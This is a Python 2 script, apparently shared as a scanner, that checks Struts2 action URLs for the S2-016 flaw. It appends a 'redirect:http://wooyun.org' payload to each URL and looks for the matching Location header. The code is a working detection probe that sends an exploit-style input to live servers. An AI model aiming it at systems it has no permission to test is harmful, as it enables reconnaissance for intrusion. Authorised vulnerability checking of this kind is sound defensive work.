struts_s2-016_vul_checker
最近的struts2漏洞检测脚本,现在各大网站应该已经修复。
#!/usr/bin/env python
# -*- coding=utf-8 -*-
'''
author: xjump.me#at#gmail.com
file: struts_s2-016_vul_checker.py
usage:
configure the check_urls list below, then
run `python struts_s2-016_vul_checker.py`
ref:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
'''
# Targets to probe. Each entry is the full URL of a Struts2 action;
# do_scan() appends the probe parameter to it as a query string.
check_urls = ['http://localhost:8080/struts2-blank/example/HelloWorld.action']
import pycurl
import sys
import urlparse
# Browser-like request headers sent with every probe request.
headers = {
    "User-Agent": "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.8",
    "Accept-Charset": "utf-8;q=0.7,*;q=0.3",
    "Connection": "keep-alive",
}

# Probe parameter for S2-016 (see the advisory linked in the module
# docstring). do_scan() reports a hit when the response headers contain a
# Location header pointing at this marker URL, so the two must stay in sync.
payload_scan = r"redirect:http://wooyun.org"
def line_sep():
    """Print a 79-character row of asterisks as a visual separator."""
    separator = "*" * 79
    print(separator)
class Handler:
    """Accumulate the chunks pycurl hands to a write or header callback."""

    def __init__(self):
        # Everything received so far, concatenated in arrival order.
        self.data = ''

    def write_callback(self, buf):
        """Append one received chunk to the buffer."""
        self.data += buf

    def get_data(self):
        """Return everything collected so far."""
        return self.data
def debug_cb(debug_type, debug_msg):
    """Print one libcurl debug event as ``debug(<type>): <message>``."""
    message = "debug(%d): %s" % (debug_type, debug_msg)
    print(message)
def progress_cb(total, existing, upload_t, upload_d):
    """Progress callback that deliberately does nothing.

    do_scan() registers this as pycurl's PROGRESSFUNCTION. The four
    arguments are accepted and ignored.
    NOTE(review): the parameter names suggest (total, transferred, upload
    total, uploaded) -- confirm against the pycurl callback signature.
    """
    # A percentage printout used to be sketched here inside a dead string
    # literal; it never ran, so the callback stays a no-op.
    return None
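def _has_probe_redirect(raw_headers, marker="http://wooyun.org"):
    """Return True if a Location header in raw_headers starts with marker."""
    for line in raw_headers.splitlines():
        name, sep, value = line.partition(":")
        # Header names are case-insensitive, so compare them lower-cased.
        if sep and name.strip().lower() == "location" \
                and value.strip().startswith(marker):
            return True
    return False


def do_scan(url, arg_timeout=1000, debug=0):
    """Probe one URL for the S2-016 ``redirect:`` behaviour and print a verdict.

    The probe parameter in ``payload_scan`` is appended to ``url`` and a single
    GET is sent. The target is reported as vulnerable when the response headers
    contain a Location header pointing at the marker URL. A negative result
    only means this one probe was not reflected; it does not show that the
    host is patched.

    Args:
        url: Full URL of the action to test.
        arg_timeout: Passed to libcurl's TIMEOUT option, which is expressed in
            seconds, so the default of 1000 is a very long wait per target.
        debug: Truthy to enable libcurl verbose output and the debug and
            progress callbacks.

    Returns:
        True if the marker redirect was seen, False if it was not, and None
        if the request itself failed.
    """
    h_body = Handler()
    h_head = Handler()

    # A URL that already has a query string needs "&"; a second "?" would
    # fold the probe into the previous parameter's value and hide a real hit.
    joiner = "&" if "?" in url else "?"
    attack_url = url + joiner + payload_scan
    host = urlparse.urlparse(url).netloc

    c = pycurl.Curl()
    try:
        c.setopt(c.URL, attack_url)
        c.setopt(
            c.HTTPHEADER,
            ["Host: %s" % host]
            + ["%s: %s" % (key, value) for key, value in headers.items()],
        )
        c.setopt(c.USERAGENT, headers["User-Agent"])
        # The body is collected only so libcurl does not dump it to stdout.
        c.setopt(c.WRITEFUNCTION, h_body.write_callback)
        c.setopt(c.HEADERFUNCTION, h_head.write_callback)
        # The verdict is read from the first response's Location header, so
        # the redirect must not be followed to the marker host.
        c.setopt(c.FOLLOWLOCATION, 0)
        if debug:
            c.setopt(c.NOPROGRESS, 0)
            c.setopt(c.PROGRESSFUNCTION, progress_cb)
            c.setopt(c.DEBUGFUNCTION, debug_cb)
        c.setopt(c.VERBOSE, debug)
        c.setopt(c.HTTPGET, 1)
        c.setopt(c.TIMEOUT, arg_timeout)
        c.setopt(c.HTTP_VERSION, c.CURL_HTTP_VERSION_1_1)
        try:
            c.perform()
        except Exception as e:
            # Report the failure instead of dropping the target silently:
            # an unreachable host must not be mistaken for a clean result.
            sys.stderr.write("[!] %s: request failed (%s)\n" % (url, e))
            return None
    finally:
        # Release the handle on every path, including the failure return.
        c.close()

    found = _has_probe_redirect(h_head.get_data())
    if found:
        print("\n[+] Vul found for %s.\n" % url)
    else:
        # Heuristic negative: only this probe was not reflected.
        print("[-] %s is Secured." % url)
    return found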
# Script entry point: probe every configured target in order.
if __name__ == "__main__":
    for target_url in check_urls:
        ret = do_scan(target_url, debug=0)